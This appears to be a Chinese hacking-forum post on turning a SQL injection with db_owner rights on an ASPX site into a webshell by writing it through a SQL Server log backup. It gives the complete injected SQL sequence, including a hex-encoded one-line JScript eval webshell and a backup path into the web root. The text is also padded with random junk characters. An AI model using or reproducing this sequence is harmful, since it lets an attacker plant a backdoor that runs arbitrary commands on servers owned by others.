最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
" D1 q0 ~3 R' Y& C/ q. B, V但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。) i, p3 M" |5 m
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。1 w. \1 j) m6 [' J- s1 y G, X" m
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
" ^; r. I7 z) c# R- x, f9 A$ |. R: x
--------------------------------------------------------------
! M, c/ r3 i: Q7 O# U2 @ n今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
0 S. }9 W$ e' j6 K* j- g3 ?" u自己修改备份语句如下:, A5 m0 x( U' a# H3 ~' V2 P( N
Drop table cmd;-- X2 w& p/ b( M* U9 A
alter database db_test set RECOVERY FULL;--# U. }- L! D4 _& ]
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段7 F: ]5 g. A. m: I. K, N( W
backup log db_test to disk = 'c:\bak' with init;--
3 N, U. B0 | m( ^# ` r& w O* dinsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
+ h8 ~/ h" C- C$ ?/ Jdelete from cmd where id>1;--删除id>1的数据
3 W+ L) p }; h) v9 Ybackup log db_test to disk = 'e:\webroot\test.aspx';--, M% e u* L# q" F6 _" O
Drop table cmd;--
8 b/ Q) H& j& O希望对大家有用。 |